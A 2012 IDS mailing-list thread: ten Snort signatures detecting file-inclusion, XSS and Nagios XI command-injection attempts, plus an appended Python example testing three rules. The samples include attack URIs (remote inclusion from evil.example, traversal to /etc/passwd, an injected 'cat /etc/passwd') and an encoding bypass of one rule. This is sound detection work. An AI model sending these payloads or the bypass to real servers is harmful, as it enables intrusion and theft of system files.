[Emerging-Sigs] StillSecure: 10 New Signatures - 7th Dec 2012

Will Metcalf wmetcalf at emergingthreatspro.com
Fri Dec 7 13:55:03 HAST 2012


Thanks and welcome back!  All posted with some minor modifications to the
pcres, removed nocase from the dir traversal content, added some fast_patterns for
the appropriate platforms, etc.

Regards,

Will

On Fri, Dec 7, 2012 at 1:20 AM, <signatures at stillsecure.com> wrote:

> Hi Matt,
>
> Please find 10 New Signatures below:
>
> 1. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation admin_header.php Remote File
> Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation admin_header.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/admin/admin_header.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13753; rev:1;)
>
> 2. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation ajax_list_tree.php Remote
> File Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation ajax_list_tree.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/includes/ajax_list_tree.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13754; rev:1;)
>
> 3. ET WEB_SPECIFIC_APPS ViArt Shop Evaluation previews_functions.php
> Remote File Inclusion Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS ViArt Shop Evaluation previews_functions.php Remote File
> Inclusion Attempt"; flow:established,to_server;
> content:"/includes/previews_functions.php?"; nocase; http_uri;
> content:"root_folder_path="; nocase; http_uri;
> pcre:"/root\_folder\_path=\s*(ftps?|https?|php)\x3a\//Ui"; reference:url,
> packetstormsecurity.org/files/116871/ViArt-Shop-Evaluation-4.1-Remote-File-Inclusion.html;
> classtype:web-application-attack; sid:13755; rev:1;)
>
> 4. ET WEB_SPECIFIC_APPS Achievo atknodetype parameter Local File Inclusion
> Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Achievo atknodetype parameter Local File Inclusion
> Vulnerability"; flow:established,to_server; content:"/dispatch.php?";
> nocase; http_uri; content:"atkaction=search"; nocase; http_uri;
> content:"atknodetype="; nocase; http_uri; content:"|2e 2e 2f|"; nocase;
> depth:200; reference:url,
> packetstormsecurity.org/files/117822/Achievo-1.4.5-XSS-LFI-SQL-Injection.html;
> classtype:web-application-attack; sid:13756; rev:1;)
>
> 5. ET WEB_SPECIFIC_APPS PRADO PHP Framework functional_tests.php Local
> File Inclusion Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS PRADO PHP Framework functional_tests.php Local File
> Inclusion Vulnerability"; flow:established,to_server; content:"GET";
> nocase; http_method; content:"/tests/test_tools/functional_tests.php?";
> nocase; http_uri; content:"sr="; nocase; http_uri; content:"|2e 2e 2f|";
> nocase; depth:200; reference:url,
> packetstormsecurity.org/files/118348/PRADO-PHP-Framework-3.2.0-File-Read.html;
> classtype:web-application-attack; sid:13757; rev:1;)
>
> 6. ET WEB_SPECIFIC_APPS PRADO PHP Framework functional.php Local File
> Inclusion Vulnerability
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS PRADO PHP Framework functional.php Local File Inclusion
> Vulnerability"; flow:established,to_server; content:"GET"; nocase;
> http_method; content:"/demos/time-tracker/tests/functional.php?"; nocase;
> http_uri; content:"sr="; nocase; http_uri; content:"|2e 2e 2f|"; nocase;
> depth:200; reference:url,
> packetstormsecurity.org/files/118348/PRADO-PHP-Framework-3.2.0-File-Read.html;
> classtype:web-application-attack; sid:13758; rev:1;)
>
> 7. ET WEB_SPECIFIC_APPS Inventory consulta_fact.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory consulta_fact.php Cross Site Scripting
> Attempt"; flow:established,to_server; content:"/consulta_fact.php?";
> nocase; http_uri; content:"fact_num="; nocase; http_uri;
> pcre:"/fact_num\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13759; rev:1;)
>
> 8. ET WEB_SPECIFIC_APPS Inventory newinventario.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory newinventario.php Cross Site Scripting
> Attempt"; flow:established,to_server; content:"/newinventario.php?";
> nocase; http_uri; content:"sn="; nocase; http_uri;
> pcre:"/sn\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13760; rev:1;)
>
> 9. ET WEB_SPECIFIC_APPS Inventory newtransact.php Cross Site Scripting
> Attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Inventory newtransact.php Cross Site Scripting Attempt";
> flow:established,to_server; content:"/newtransact.php?"; nocase; http_uri;
> content:"ref="; nocase; http_uri;
> pcre:"/ref\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ui";
> reference:url,
> packetstormsecurity.org/files/117683/Inventory-1.0-Cross-Site-Scripting.html;
> classtype:web-application-attack; sid:13761; rev:1;)
>
> 10. ET WEB_SPECIFIC_APPS Nagios XI Network Monitor host parameter OS
> command injection attempt
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC_APPS Nagios XI Network Monitor host parameter OS command
> injection attempt"; flow:established,to_server;
> content:"/includes/components/graphexplorer/visApi.php?"; nocase; http_uri;
> content:"type="; nocase; http_uri; content:"host="; nocase; http_uri;
> pcre:"/host\x3d.+cat.+\/.+/Ui"; reference:url,
> packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html;
> classtype:web-application-attack; sid:13762; rev:1;)
>
> Looking forward to your comments, if any.
>
> Thanks & Regards,
> StillSecure
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at lists.emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> Support Emerging Threats! Subscribe to Emerging Threats Pro
> http://www.emergingthreatspro.com
> The ONLY place to get complete premium rulesets for Snort 2.4.0 through
> Current!
>
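To see concretely what the quoted signatures do and do not fire on, here is an added example of my own, not part of the posting and not ET or Snort code, that models the content/pcre logic of three of them (sid:13753, sid:13756 and sid:13762) in Python and runs it over constructed request URIs. The rule text is taken from the posting; everything around it is the example's. The http_uri buffer is approximated by percent-decoding the URI (Snort's normaliser does more, so that is an assumption), and the |2e 2e 2f| match in sid:13756, which carries depth:200 but no http_uri modifier, is applied to the raw request bytes as Snort would. The sample URIs, including the evil.example host, are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Hand-reduced models of three of the quoted signatures (sid:13753, sid:13756,
# sid:13762). "uri_contents" are the content matches carrying nocase and
# http_uri; "pcre" is the /Ui regex applied to the same buffer; "raw_content"
# is a content match that in the original has depth:200 but no http_uri and
# therefore runs against the raw payload. The rule text is from the posting;
# the structure around it is this example's own.
RULES = {
    13753: {  # ViArt Shop Evaluation admin_header.php RFI
        "uri_contents": ["/admin/admin_header.php?", "root_folder_path="],
        "pcre": r"root\_folder\_path=\s*(ftps?|https?|php)\x3a\/",
        "raw_content": None,
    },
    13756: {  # Achievo atknodetype LFI
        "uri_contents": ["/dispatch.php?", "atkaction=search", "atknodetype="],
        "pcre": None,
        "raw_content": b"\x2e\x2e\x2f",  # |2e 2e 2f| == "../"
    },
    13762: {  # Nagios XI visApi.php host parameter command injection
        "uri_contents": ["/includes/components/graphexplorer/visApi.php?",
                         "type=", "host="],
        "pcre": r"host\x3d.+cat.+\/.+",
        "raw_content": None,
    },
}


def normalised_uri(raw_uri: str) -> str:
    """Approximation of Snort's http_uri buffer: percent-decode the raw URI.
    (Snort's normaliser does more, e.g. slash folding; this simplification
    is an assumption of the example.)"""
    return unquote(raw_uri)


def rule_matches(sid: int, raw_uri: str) -> bool:
    """Return True if the modelled rule would alert on a GET for raw_uri."""
    rule = RULES[sid]
    uri = normalised_uri(raw_uri)
    lowered = uri.lower()

    # content:"..."; nocase; http_uri;  -> case-insensitive substring of the
    # normalised URI; every content in the rule must be present.
    if not all(c.lower() in lowered for c in rule["uri_contents"]):
        return False

    # pcre:"/.../Ui" -> case-insensitive regex over the normalised URI.
    if rule["pcre"] and not re.search(rule["pcre"], uri, re.IGNORECASE):
        return False

    # content:"|2e 2e 2f|"; nocase; depth:200;  -> bytes within the first 200
    # bytes of the raw payload, not the decoded URI. nocase has no effect on
    # non-alphabetic bytes, which is why it can be dropped.
    if rule["raw_content"]:
        request_line = f"GET {raw_uri} HTTP/1.1\r\n".encode()
        if rule["raw_content"] not in request_line[:200]:
            return False
    return True


# Constructed sample request URIs (no real hosts or captured traffic).
SAMPLES = [
    (13753, "/admin/admin_header.php?root_folder_path=http://evil.example/s.txt?", True),
    (13753, "/ADMIN/Admin_Header.php?ROOT_FOLDER_PATH=HTTPS://evil.example/s.txt", True),
    (13753, "/admin/admin_header.php?root_folder_path=/var/www/viart/", False),
    (13756, "/dispatch.php?atkaction=search&atknodetype=../../../../etc/passwd", True),
    # Percent-encoded traversal: the http_uri contents still match after
    # decoding, but the raw |2e 2e 2f| check sees "%2e%2e%2f" and misses it.
    (13756, "/dispatch.php?atkaction=search&atknodetype=%2e%2e%2f%2e%2e%2fetc/passwd", False),
    (13762, "/includes/components/graphexplorer/visApi.php?type=host&host=localhost%3Bcat%20/etc/passwd", True),
    (13762, "/includes/components/graphexplorer/visApi.php?type=host&host=localhost", False),
    # The pcre's .+ is not confined to the host value, so "cat" and "/" in a
    # later parameter are enough to fire it.
    (13762, "/includes/components/graphexplorer/visApi.php?type=host&host=db1&view=allocated/daily", True),
]


def run_samples():
    """Evaluate every constructed sample; returns [(sid, uri, alerted)]."""
    return [(sid, uri, rule_matches(sid, uri)) for sid, uri, _ in SAMPLES]


def samples_agree() -> bool:
    """True when every sample produced the outcome noted next to it."""
    return all(rule_matches(sid, uri) == expected for sid, uri, expected in SAMPLES)


if __name__ == "__main__":
    for sid, uri, alerted in run_samples():
        print(f"sid:{sid} {'ALERT ' if alerted else 'silent'} {uri}")
```

Two things the run makes visible that the rule text alone does not: the traversal check in the LFI rules sits on the raw payload, so a percent-encoded "../" passes the http_uri contents and still slips under the |2e 2e 2f| match, and the Nagios pcre's unanchored .+ lets "cat" and "/" anywhere later in the query string satisfy it, which is worth keeping in mind when tuning for false positives.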